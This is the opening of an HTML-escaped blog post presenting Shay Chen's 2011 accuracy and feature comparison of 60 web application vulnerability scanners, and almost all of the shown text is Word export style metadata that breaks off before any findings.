Application Scanner Benchmark</title><content type='html'>&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 44pt; line-height: 115%;&quot;&gt;The Scanning Legion:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 44pt; line-height: 115%;&quot;&gt;Web Application Scanners Accuracy Assessment &amp;amp; Feature Comparison&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 30pt; line-height: 115%;&quot;&gt;Commercial &amp;amp; Open Source Scanners&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;A Comparison of &lt;b&gt;&lt;span style=&quot;font-size: 14pt; line-height: 115%;&quot;&gt;60&lt;/span&gt;&lt;/b&gt; Commercial &amp;amp; Open Source Black Box Web Application Vulnerability Scanners&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;By Shay Chen&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Security Consultant, Researcher &amp;amp; Instructor&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict.blogspot.com/&quot;&gt;http://sectooladdict.blogspot.com/&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;sectooladdict-$at$-gmail-$dot$-com&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;August 2011&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Assessment Environments:&lt;/i&gt;&lt;/b&gt; WAVSEP 1.0 / WAVSEP 1.0.3 (&lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;http://code.google.com/p/wavsep/&lt;/a&gt;)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:WordDocument&gt;   &lt;w:View&gt;Normal&lt;/w:View&gt;   &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:TrackMoves/&gt;   &lt;w:TrackFormatting/&gt;   &lt;w:PunctuationKerning/&gt;   &lt;w:ValidateAgainstSchemas/&gt;   &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:DoNotPromoteQF/&gt;   &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;   &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:LidThemeComplexScript&gt;HE&lt;/w:LidThemeComplexScript&gt;   &lt;w:Compatibility&gt;    &lt;w:BreakWrappedTables/&gt;    &lt;w:SnapToGridInCell/&gt;    &lt;w:WrapTextWithPunct/&gt;    &lt;w:UseAsianBreakRules/&gt;    &lt;w:DontGrowAutofit/&gt;    &lt;w:SplitPgBreakAndParaMark/&gt;    &lt;w:DontVertAlignCellWithSp/&gt;    &lt;w:DontBreakConstrainedForcedTables/&gt;    &lt;w:DontVertAlignInTxbx/&gt;    &lt;w:Word11KerningPairs/&gt;    &lt;w:CachedColBalance/&gt;   &lt;/w:Compatibility&gt;   &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;   &lt;m:mathPr&gt;    &lt;m:mathFont m:val=&quot;Cambria Math&quot;/&gt;    &lt;m:brkBin m:val=&quot;before&quot;/&gt;    &lt;m:brkBinSub m:val=&quot;&amp;#45;-&quot;/&gt;    &lt;m:smallFrac m:val=&quot;off&quot;/&gt;    &lt;m:dispDef/&gt;    &lt;m:lMargin m:val=&quot;0&quot;/&gt;    &lt;m:rMargin m:val=&quot;0&quot;/&gt;    &lt;m:defJc m:val=&quot;centerGroup&quot;/&gt;    &lt;m:wrapIndent m:val=&quot;1440&quot;/&gt;    &lt;m:intLim m:val=&quot;subSup&quot;/&gt;    &lt;m:naryLim m:val=&quot;undOvr&quot;/&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:LatentStyles DefLockedState=&quot;false&quot; DefUnhideWhenUsed=&quot;true&quot;
  DefSemiHidden=&quot;true&quot; DefQFormat=&quot;false&quot; DefPriority=&quot;99&quot;
  LatentStyleCount=&quot;267&quot;&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;0&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Normal&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;heading 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 7&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 8&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 9&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 7&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 8&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 9&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;35&quot; QFormat=&quot;true&quot; Name=&quot;caption&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;10&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Title&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; Name=&quot;Default Paragraph Font&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;11&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtitle&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;22&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Strong&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;20&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Emphasis&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;59&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Table Grid&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; UnhideWhenUsed=&quot;false&quot; Name=&quot;Placeholder Text&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;No Spacing&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; UnhideWhenUsed=&quot;false&quot; Name=&quot;Revision&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;34&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;List Paragraph&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;29&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Quote&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;30&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Quote&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
